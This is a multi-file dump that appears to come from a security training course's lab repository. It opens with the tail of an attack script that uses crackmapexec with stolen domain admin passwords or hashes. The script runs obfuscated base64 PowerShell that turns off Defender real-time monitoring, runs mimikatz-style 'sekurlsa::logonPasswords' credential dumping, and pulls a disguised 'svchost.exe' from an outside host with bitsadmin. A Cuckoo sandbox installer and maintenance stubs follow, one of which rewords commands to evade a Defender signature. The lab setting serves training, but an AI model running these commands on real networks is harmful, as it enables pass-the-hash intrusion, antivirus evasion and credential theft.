54 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -H $administratorhash -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHAAaQBuAGcAYwBhAHMAdABsAGUALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
55 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorhash -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
56 | 
57 | elif [ "$alanmarshalldadmpwd" != "" ]
58 | then 
59 |    echo ""
60 |    echo "Use identified domain admin 'alan.marshall.dadm' account against DC on $ip (using password '$alanmarshalldadmpwd')"
61 |    echo "------------------------------------------------------------------------------------------------------------------"
62 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmpwd -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
63 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmpwd -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\Administrator\\Downloads\\pingcastle.exe'
64 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmpwd -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHAAaQBuAGcAYwBhAHMAdABsAGUALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
65 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmpwd -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
66 | 
67 | elif [ "$alanmarshalldadmhash" != "" ]
68 | then 
69 |    echo ""
70 |    echo "Use identified domain admin 'alan.marshall.dadm' account against DC on $ip (using hash '$alanmarshalldadmhash')"
71 |    echo "---------------------------------------------------------------------------------------------------------------"
72 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmhash -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
73 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -H $alanmarshalldadmhash -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\Administrator\\Downloads\\pingcastle.exe'
74 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -H $alanmarshalldadmhash -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHAAaQBuAGcAYwBhAHMAdABsAGUALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
75 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -H $alanmarshalldadmhash -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
76 | else
77 |    echo ""
78 |    echo "No domain admin credentials found..."
79 | fi
80 |   echo "Removing portforward to session $c - IP address $ip"
81 |   echo "---------------------------------------------------"
82 |   cp /root/Desktop/CTF/6-stopportforwardtemplate /root/Desktop/CTF/6-stopportforward.rc
83 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/6-stopportforward.rc
84 |   echo "resource /root/Desktop/CTF/6-stopportforward.rc" | nc 127.0.0.1 55554
85 | done </root/Desktop/CTF/output/2-cms_sessions-initial
86 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SEC599


--------------------------------------------------------------------------------
/cuckoo-install.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | # CuckooAutoInstall
  4 | 
  5 | # Copyright (C) 2014-2015 David Reguera García - dreg@buguroo.com
  6 | # Copyright (C) 2015 David Francos Cuartero - dfrancos@buguroo.com
  7 | # Copyright (C) 2017-2018 Erik Van Buggenhout & Didier Stevens - NVISO
  8 | 
  9 | # This program is free software: you can redistribute it and/or modify
 10 | # it under the terms of the GNU General Public License as published by
 11 | # the Free Software Foundation, either version 3 of the License, or
 12 | # any later version.
 13 | 
 14 | # This program is distributed in the hope that it will be useful,
 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 17 | # GNU General Public License for more details.
 18 | 
 19 | # You should have received a copy of the GNU General Public License
 20 | # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 21 | 
 22 | source /etc/os-release
 23 | 
 24 | # Configuration variables. Tailor to your environment
 25 | CUCKOO_GUEST_IMAGE="/tmp/W7-01.ova"
 26 | CUCKOO_GUEST_NAME="vm"
 27 | CUCKOO_GUEST_IP="192.168.87.15"
 28 | INTERNET_INT_NAME="eth0"
 29 | 
 30 | # Base variables. Only change these if you know what you are doing...
 31 | SUDO="sudo"
 32 | TMPDIR=$(mktemp -d)
 33 | RELEASE=$(lsb_release -cs)
 34 | CUCKOO_USER="cuckoo"
 35 | CUCKOO_PASSWD="cuckoo"
 36 | CUSTOM_PKGS=""
 37 | ORIG_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}"  )" && pwd  )
 38 | VOLATILITY_URL="http://downloads.volatilityfoundation.org/releases/2.4/volatility-2.4.tar.gz"
 39 | YARA_REPO="https://github.com/plusvic/yara"
 40 | 
 41 | VIRTUALBOX_REP="deb http://download.virtualbox.org/virtualbox/debian $RELEASE contrib"
 42 | 
 43 | VIRTUALBOX_INT_NAME="vboxnet0"
 44 | VIRTUALBOX_INT_NETWORK="192.168.87.0/24"
 45 | VIRTUALBOX_INT_ADDR="192.168.87.1"
 46 | VIRTUALBOX_INT_SUBNET="255.255.255.0"
 47 | 
 48 | LOG=$(mktemp)
 49 | UPGRADE=true
 50 | 
 51 | declare -a packages
 52 | declare -a python_packages
 53 | 
 54 | packages="git python python-pip libffi-dev libssl-dev python-virtualenv python-setuptools libjpeg-dev zlib1g-dev swig postgresql libpq-dev tcpdump apparmor-utils libtiff5-dev libjpeg8-dev zlib1g-dev libfreetype6-dev liblcms2-dev libwebp-dev tcl8.6-dev tk8.6-dev python-tk build-essential libssl-dev libffi-dev python-dev libssl-dev libjansson-dev virtualbox mongodb"
 55 | #python_packages="pip setuptools cuckoo distorm3 yara-python"
 56 | python_packages="pip setuptools cuckoo distorm3 yara-python==3.6.3 pycrypto"
 57 | 
 58 | # Pretty icons
 59 | log_icon="\e[31m✓\e[0m"
 60 | log_icon_ok="\e[32m✓\e[0m"
 61 | log_icon_nok="\e[31m✗\e[0m"
 62 | 
 63 | # -
 64 | 
 65 | print_copy(){
 66 | cat <<EO
 67 | ┌─────────────────────────────────────────────────────────┐
 68 | │                CuckooAutoInstall 0.2 - NVISO Mod        │
 69 | │ David Reguera García - Dreg <dreguera@buguroo.com>      │
 70 | │ David Francos Cuartero - XayOn <dfrancos@buguroo.com>   │
 71 | │ Erik Van Buggenhout - <evanbuggenhout@nviso.be>         |
 72 | │ Didier Stevens - <dstevens@nviso.be                     |
 73 | │            Buguroo Offensive Security - 2015            │
 74 | │            NVISO - 2017-2018                            │
 75 | └─────────────────────────────────────────────────────────┘
 76 | EO
 77 | }
 78 | 
 79 | check_viability(){
 80 |     [[ $UID != 0 ]] && {
 81 |         type -f $SUDO || {
 82 |             echo "You're not root and you don't have $SUDO, please become root or install $SUDO before executing $0"
 83 |             exit
 84 |         }
 85 |     } || {
 86 |         SUDO=""
 87 |     }
 88 | 
 89 |     [[ ! -e /etc/debian_version ]] && {
 90 |         echo  "This script currently works only on debian-based (debian, ubuntu...) distros"
 91 |         exit 1
 92 |     }
 93 | }
 94 | 
 95 | print_help(){
 96 |     cat <<EOH
 97 | Usage: $0 [--verbose|-v] [--help|-h] [--upgrade|-u]
 98 | 
 99 |     --verbose   Print output to stdout instead of temp logfile
100 |     --help      This help menu
101 |     --upgrade   Use newer volatility, yara and jansson versions (install from source)
102 | 
103 | EOH
104 |     exit 1
105 | }
106 | 
107 | setopts(){
108 |     optspec=":hvu-:"
109 |     while getopts "$optspec" optchar; do
110 |         case "${optchar}" in
111 |             -)
112 |                 case "${OPTARG}" in
113 |                     help) print_help ;;
114 |                     upgrade) UPGRADE=true ;;
115 |                     verbose) LOG=/dev/stdout ;;
116 |                 esac;;
117 |             h) print_help ;;
118 |             v) LOG=/dev/stdout;;
119 |             u) UPGRADE=true;;
120 |         esac
121 |     done
122 | }
123 | 
124 | run_and_log(){
125 |     $1 &> ${LOG} && {
126 |         _log_icon=$log_icon_ok
127 |     } || {
128 |         _log_icon=$log_icon_nok
129 |         exit_=1
130 |     }
131 |     echo -e "${_log_icon} ${2}"
132 |     [[ $exit_ ]] && { echo -e "\t -> ${_log_icon} $3";  exit; }
133 | }
134 | 
135 | clone_repos(){
136 |     git clone ${YARA_REPO}
137 |     return 0
138 | }
139 | 
140 | cdcuckoo(){
141 |     eval cd ~${CUCKOO_USER}
142 |     return 0
143 | }
144 | 
145 | create_cuckoo_user(){
146 | #    $SUDO adduser  -gecos "" ${CUCKOO_USER}
147 | #    $SUDO echo ${CUCKOO_PASSWD} | passwd ${CUCKOO_USER} --stdin
148 |     $SUDO adduser --disabled-login -gecos "" ${CUCKOO_USER}
149 |     echo -e "${CUCKOO_PASSWD}\n${CUCKOO_PASSWD}" | $SUDO passwd ${CUCKOO_USER}
150 |     $SUDO usermod -G vboxusers ${CUCKOO_USER}
151 |     return 0
152 | }
153 | 
154 | create_hostonly_iface(){
155 |     FOUND=`grep "vboxnet0" /proc/net/dev`
156 | 
157 |     if  [ -n "$FOUND" ] ; then
158 |     echo "vboxnet0 already exists"
159 |     else
160 |     echo "vboxnet0 doesn't exist, creating it..."
161 |     $SUDO vboxmanage hostonlyif create
162 |     fi
163 |     $SUDO vboxmanage dhcpserver modify --ifname $VIRTUALBOX_INT_NAME --disable
164 |     $SUDO vboxmanage hostonlyif ipconfig $VIRTUALBOX_INT_NAME --ip $VIRTUALBOX_INT_ADDR --netmask $VIRTUALBOX_INT_SUBNET
165 |     $SUDO iptables -A FORWARD -o $INTERNET_INT_NAME -i $VIRTUALBOX_INT_NAME -s $VIRTUALBOX_INT_NETWORK -m conntrack --ctstate NEW -j ACCEPT
166 |     $SUDO iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
167 |     $SUDO iptables -A POSTROUTING -t nat -j MASQUERADE
168 | 
169 |     $SUDO sysctl -w net.ipv4.ip_forward=1
170 |   return 0
171 | }
172 | 
173 | allow_tcpdump(){
174 |     $SUDO /bin/bash -c 'setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump' 2 &> /dev/null
175 |     $SUDO aa-disable /usr/sbin/tcpdump
176 |     return 0
177 | }
178 | 
179 | build_yara(){
180 |     cd ${TMPDIR}/yara
181 |     ./bootstrap.sh
182 |     $SUDO autoreconf -vi --force
183 |     ./configure --enable-cuckoo --enable-magic
184 |     make
185 |     $SUDO make install
186 |     cd yara-python/
187 |     $SUDO python setup.py install
188 |     cd ${TMPDIR}
189 |     return 0
190 | }
191 | 
192 | build_volatility(){
193 |     wget $VOLATILITY_URL
194 |     tar xvf volatility-2.4.tar.gz
195 |     cd volatility-2.4/
196 |     $SUDO python setup.py build
197 |     $SUDO python setup.py install
198 |     return 0
199 | }
200 | 
201 | prepare_virtualbox(){
202 |     cd ${TMPDIR}
203 |     echo ${VIRTUALBOX_REP} |$SUDO tee /etc/apt/sources.list.d/virtualbox.list
204 |     wget -O - https://www.virtualbox.org/download/oracle_vbox.asc | $SUDO apt-key add -
205 |     pgrep virtualbox && return 1
206 |     pgrep VBox && return 1 
207 |     return 0
208 | }
209 | 
210 | install_packages(){
211 |     $SUDO apt-get update
212 |     $SUDO apt-get install -y ${packages["${RELEASE}"]}
213 |     $SUDO apt-get install -y $CUSTOM_PKGS
214 |     $SUDO apt-get -y install 
215 |     return 0
216 | }
217 | 
218 | install_python_packages(){
219 |     pip install $python_packages --upgrade
220 |     return 0
221 | }
222 | 
223 | run_cuckoo_community(){
224 |     runuser -l $CUCKOO_USER -c 'cuckoo'
225 |     runuser -l $CUCKOO_USER -c 'cuckoo community'
226 |     return 0
227 | }
228 | 
229 | # The imported virtualbox VM should have the following config:
230 | # - Installed Python 2.7
231 | # - Installed Cuckoo Agent
232 | # - Disabled UAC, AV, Updates, Firewall
233 | # - Any other software that is to be installed
234 | # - IP settings: 192.168.87.15 - 255.255.255.0 - GW:192.168.87.1 DNS:192.168.87.1
235 | 
236 | import_virtualbox_vm(){
237 |     runuser -l $CUCKOO_USER -c "vboxmanage import ${CUCKOO_GUEST_IMAGE}"
238 |     runuser -l $CUCKOO_USER -c "vboxmanage modifyvm ${CUCKOO_GUEST_NAME} --nic1 hostonly --hostonlyadapter1 ${VIRTUALBOX_INT_NAME}"
239 |     return 0
240 | }
241 | 
242 | launch_virtualbox_vm(){
243 |     runuser -l $CUCKOO_USER -c "vboxmanage startvm ${CUCKOO_GUEST_NAME} --type headless"
244 |     return 0
245 | }
246 | 
247 | create_virtualbox_vm_snapshot(){
248 |     runuser -l $CUCKOO_USER -c "vboxmanage snapshot ${CUCKOO_GUEST_NAME} take clean"
249 |     return 0
250 | }
251 | 
252 | poweroff_virtualbox_vm(){
253 |     runuser -l $CUCKOO_USER -c "vboxmanage controlvm ${CUCKOO_GUEST_NAME} poweroff"
254 |     sleep 30
255 |     runuser -l $CUCKOO_USER -c "vboxmanage snapshot ${CUCKOO_GUEST_NAME} restorecurrent"
256 | }
257 | 
258 | update_cuckoo_config(){
259 |     # Update IP address of result server
260 |     sed -i "s/192.168.56.1/${VIRTUALBOX_INT_ADDR}/g" /home/$CUCKOO_USER/.cuckoo/conf/cuckoo.conf
261 |     sed -i "s/192.168.56.1/${VIRTUALBOX_INT_ADDR}/g" /home/$CUCKOO_USER/.cuckoo/conf/routing.conf
262 | 
263 |     # Update VM settings
264 |     sed -i "s/label = cuckoo1/label = ${CUCKOO_GUEST_NAME}/g" /home/$CUCKOO_USER/.cuckoo/conf/virtualbox.conf
265 |     sed -i "s/ip = 192.168.56.101/ip = ${CUCKOO_GUEST_IP}/g" /home/$CUCKOO_USER/.cuckoo/conf/virtualbox.conf
266 |     sed -i "/\[mongodb\]/{ N; s/.*/\[mongodb\]\nenabled = yes/; }" /home/$CUCKOO_USER/.cuckoo/conf/reporting.conf
267 |     sed -i 's/"192.168.56.1"/"${VIRTUALBOX_INT_ADDR}"/g' /home/$CUCKOO_USER/.config/VirtualBox/VirtualBox.xml
268 |     sed -i '/DHCPServer/d' /home/$CUCKOO_USER/.config/VirtualBox/VirtualBox.xml
269 | }
270 | 
271 | create_cuckoo_startup_scripts(){
272 |     $SUDO rm /root/cuckoo-start.sh
273 |     $SUDO rm /root/cuckoo-kill.sh
274 |     $SUDO echo "#!/bin/bash" >> /root/cuckoo-start.sh
275 |     $SUDO echo "# Cuckoo run script" >> /root/cuckoo-start.sh
276 |     $SUDO echo "#!/bin/bash" >> /root/cuckoo-kill.sh
277 |     $SUDO echo "# Cuckoo run script" >> /root/cuckoo-kill.sh
278 |     $SUDO echo "killall cuckoo" >> /root/cuckoo-start.sh
279 |     $SUDO echo "pkill -f 'cuckoo web runserver'" >> /root/cuckoo-start.sh
280 | 
281 |     $SUDO echo "vboxmanage dhcpserver modify --ifname $VIRTUALBOX_INT_NAME --disable" >> /root/cuckoo-start.sh
282 |     $SUDO echo "vboxmanage hostonlyif ipconfig $VIRTUALBOX_INT_NAME --ip $VIRTUALBOX_INT_ADDR --netmask $VIRTUALBOX_INT_SUBNET" >> /root/cuckoo-start.sh
283 |     $SUDO echo "iptables -A FORWARD -o $INTERNET_INT_NAME -i $VIRTUALBOX_INT_NAME -s $VIRTUALBOX_INT_NETWORK -m conntrack --ctstate NEW -j ACCEPT" >> /root/cuckoo-start.sh
284 |     $SUDO echo "iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT" >> /root/cuckoo-start.sh
285 |     $SUDO echo "iptables -A POSTROUTING -t nat -j MASQUERADE" >> /root/cuckoo-start.sh
286 |     $SUDO echo "sysctl -w net.ipv4.ip_forward=1" >> /root/cuckoo-start.sh
287 | 
288 |     $SUDO echo "killall cuckoo" >> /root/cuckoo-kill.sh
289 |     $SUDO echo "pkill -f 'cuckoo web runserver'" >> /root/cuckoo-kill.sh
290 |     $SUDO echo "runuser -l cuckoo -c 'cuckoo' &" >> /root/cuckoo-start.sh
291 |     $SUDO echo "runuser -l cuckoo -c 'cuckoo web runserver 0.0.0.0:8000' &" >> /root/cuckoo-start.sh
292 |     $SUDO echo "runuser -l cuckoo -c 'cuckoo api --host 0.0.0.0 --port 8090' &" >> /root/cuckoo-start.sh
293 |     $SUDO sed -i "/# By default this script does nothing./ { N; s/# By default this script does nothing./&\n\/root\/cuckoo-start.sh\n/ }" /etc/rc.local
294 | 
295 |     $SUDO chmod +x /root/cuckoo-start.sh
296 |     $SUDO chmod +x /root/cuckoo-kill.sh
297 | }
298 | 
299 | # Init.
300 | 
301 | print_copy
302 | check_viability
303 | setopts ${@}
304 | 
305 | # Load config
306 | 
307 | source config &>/dev/null
308 | 
309 | echo "Logging enabled on ${LOG}"
310 | 
311 | # Install packages
312 | run_and_log prepare_virtualbox "Getting virtualbox repo ready" "Virtualbox is running, please close it"
313 | run_and_log install_packages "Installing packages ${CUSTOM_PKGS} and ${packages[$RELEASE]}" "Something failed installing packages, please look at the log file"
314 | 
315 | # Create user and clone repos
316 | run_and_log create_cuckoo_user "Creating cuckoo user" "Could not create cuckoo user"
317 | run_and_log clone_repos "Cloning repositories" "Could not clone repos"
318 | 
319 | # Install python packages
320 | run_and_log install_python_packages "Installing python packages: ${python_packages}" "Something failed install python packages, please look at the log file"
321 | 
322 | # Install volatility
323 | run_and_log build_volatility "Installing volatility"
324 | 
325 | # Networking (latest, because sometimes it crashes...)
326 | run_and_log create_hostonly_iface "Creating hostonly interface for cuckoo"
327 | run_and_log allow_tcpdump "Allowing tcpdump for normal users"
328 | 
329 | # Preparing VirtualBox VM
330 | run_and_log import_virtualbox_vm "Importing specified VirtualBoxVM"
331 | run_and_log launch_virtualbox_vm "Launching imported VM"
332 | sleep 60
333 | run_and_log create_virtualbox_vm_snapshot "Creating snapshot 'Clean'"
334 | run_and_log poweroff_virtualbox_vm
335 | 
336 | # Configuring Cuckoo
337 | run_and_log run_cuckoo_community "Downloading community rules"
338 | run_and_log update_cuckoo_config "Updating Cuckoo config files"
339 | run_and_log create_cuckoo_startup_scripts "Creating Cuckoo startup scripts"
340 | 


--------------------------------------------------------------------------------
/dc-execute.cmd:
--------------------------------------------------------------------------------
1 | REM SEC599 Maintenance script for DC
2 | REM ---------------------------------
3 | REM Last update: 30 January 2019
4 | REM This script is used for emergency patches / updates in SEC599
5 | 


--------------------------------------------------------------------------------
/kali-DTF-execute.sh:
--------------------------------------------------------------------------------
 1 | # SEC599 Maintenance script for Kali DTF
 2 | # --------------------------------------
 3 | # Last update: 30 August 2019
 4 | # This script is used for emergency patches / updates in SEC599
 5 | 
 6 | # Issue description: A recent Defender update triggers on the following exact commandline combination: "privilege::debug sekurlsa::logonPasswords"
 7 | # Solution: Use PowerShell to avoid "privilege::debug" (PowerShell already has debug privilege)
 8 | 
 9 | /usr/bin/wget -O /root/Desktop/CTF/4-movetowin01-INITIAL.sh https://raw.githubusercontent.com/NVISO-BE/SEC599/master/4-movetowin01-INITIAL.sh
10 | /usr/bin/wget -O /root/Desktop/CTF/4-movetowin01-FINAL.sh https://raw.githubusercontent.com/NVISO-BE/SEC599/master/4-movetowin01-FINAL.sh
11 | 
12 | /usr/bin/wget -O /root/Desktop/CTF/5-movetowin02-INITIAL.sh https://raw.githubusercontent.com/NVISO-BE/SEC599/master/5-movetowin02-INITIAL.sh
13 | /usr/bin/wget -O /root/Desktop/CTF/5-movetowin02-FINAL.sh https://raw.githubusercontent.com/NVISO-BE/SEC599/master/5-movetowin02-FINAL.sh
14 | 
15 | /usr/bin/wget -O /root/Desktop/CTF/6-movetodc-INITIAL.sh https://raw.githubusercontent.com/NVISO-BE/SEC599/master/6-movetodc-INITIAL.sh
16 | /usr/bin/wget -O /root/Desktop/CTF/6-movetodc-FINAL.sh https://raw.githubusercontent.com/NVISO-BE/SEC599/master/6-movetodc-FINAL.sh
17 | 


--------------------------------------------------------------------------------
/kali-execute.sh:
--------------------------------------------------------------------------------
1 | # SEC599 Maintenance script for Kali
2 | # ----------------------------------
3 | # Last update: 30 January 2019
4 | # This script is used for emergency patches / updates in SEC599
5 | 


--------------------------------------------------------------------------------
/ubuntu01-execute.sh:
--------------------------------------------------------------------------------
1 | # SEC599 Maintenance script for Ubuntu01
2 | # --------------------------------------
3 | # Last update: 30 January 2019
4 | # This script is used for emergency patches / updates in SEC599
5 | 


--------------------------------------------------------------------------------
/ubuntu02-execute.sh:
--------------------------------------------------------------------------------
1 | # SEC599 Maintenance script for Ubuntu02
2 | # --------------------------------------
3 | # Last update: 30 January 2019
4 | # This script is used for emergency patches / updates in SEC599
5 | 


--------------------------------------------------------------------------------
/ubuntu03-execute.sh:
--------------------------------------------------------------------------------
1 | # SEC599 Maintenance script for Ubuntu03
2 | # --------------------------------------
3 | # Last update: 30 January 2019
4 | # This script is used for emergency patches / updates in SEC599
5 | 


--------------------------------------------------------------------------------
/windows01-execute.cmd:
--------------------------------------------------------------------------------
1 | REM SEC599 Maintenance script for Windows01
2 | REM ---------------------------------------
3 | REM Last update: 30 January 2019
4 | REM This script is used for emergency patches / updates in SEC599
5 | 


--------------------------------------------------------------------------------
/windows02-execute.cmd:
--------------------------------------------------------------------------------
1 | REM SEC599 Maintenance script for Windows02
2 | REM ---------------------------------------
3 | REM Last update: 30 January 2019
4 | REM This script is used for emergency patches / updates in SEC599
5 | 


--------------------------------------------------------------------------------